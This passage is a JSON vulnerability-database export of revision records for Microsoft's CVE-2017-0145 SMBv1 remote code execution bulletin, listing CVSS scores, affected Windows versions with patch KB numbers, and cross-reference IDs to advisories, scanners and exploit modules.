"malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012216", "KB4012212", "KB4012215", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB3210721", "KB4013198", "KB4012214", "KB4014077", "KB4012217", "KB4012598", "KB4013429", "KB3210720", "KB4012213", "KB3205409", "KB3177186", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T04:50:53", "differentElements": ["msAffectedSoftware"], "edition": 42}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-13T06:59:52", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB3210720", "KB3205401", "KB4013198", "KB4012216", "KB3205409", "KB3212646", "KB3213986", "KB4012213", "KBMS16-110, 3187754", "KB4012212", "KB4012598", "KB4012606", "KB4012217", "KB4013429", "KB4012214", "KB3177186", "KB3210721", "KB4014077"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T06:59:52", "differentElements": ["msAffectedSoftware"], "edition": 43}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-13T10:45:10", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB3205409", "KB3177186", "KB4012598", "KB4012216", "KB4012217", "KB4013429", "KB3210720", "KB4012212", "KB3205401", "KB4012213", "KB4012606", "KBMS16-110, 3187754", "KB4012215", "KB4013198", "KB4014077", "KB3210721", "KB3212646", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", 